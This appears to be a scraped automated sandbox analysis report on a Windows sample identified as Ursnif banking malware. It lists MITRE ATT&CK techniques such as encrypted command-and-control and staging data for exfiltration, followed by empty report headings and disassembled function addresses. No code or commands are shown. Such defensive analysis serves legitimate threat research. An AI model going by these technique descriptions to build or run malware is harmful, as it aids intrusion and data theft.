Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Rats4dIOmA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 004019A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140
threadsleepnativeCOMMON

Function 00401E22, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 03C47A2E, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 03C49A0F, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 03C45988, Relevance: 9.1, APIs: 6, Instructions: 124
filenetworkCOMMON

Function 00401C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 00401264, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 00401703, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 03C49BF1, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Function 03C4A85C, Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Function 03C4AC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 03C47C3D, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Function 03C48E0D, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 03C458DB, Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Function 03C4A2C6, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 00401000, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 03C42789, Relevance: 9.1, APIs: 6, Instructions: 61
sleepmemorytimeCOMMON

Function 03C497F7, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Function 03C42F70, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 03C42D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Function 00401D38, Relevance: 7.5, APIs: 5, Instructions: 19
memoryCOMMON

Function 004014AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 03C41128, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Function 03C45319, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 03C42C58, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Function 00401BAE, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 03C44A2A, Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Function 03C476E7, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Function 004013C4, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Function 03C4831C, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Function 03C47EFD, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 03C4933A, Relevance: 1.6, APIs: 1, Instructions: 70
synchronizationCOMMON

Function 03C41037, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 0040136F, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 03C48B22, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 00401D7E, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 03C45D79, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Function 03C47FBE, Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Function 03C48F1B, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Function 00401752, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Function 03C4836E, Relevance: 1.9, APIs: 1, Instructions: 611
COMMONCrypto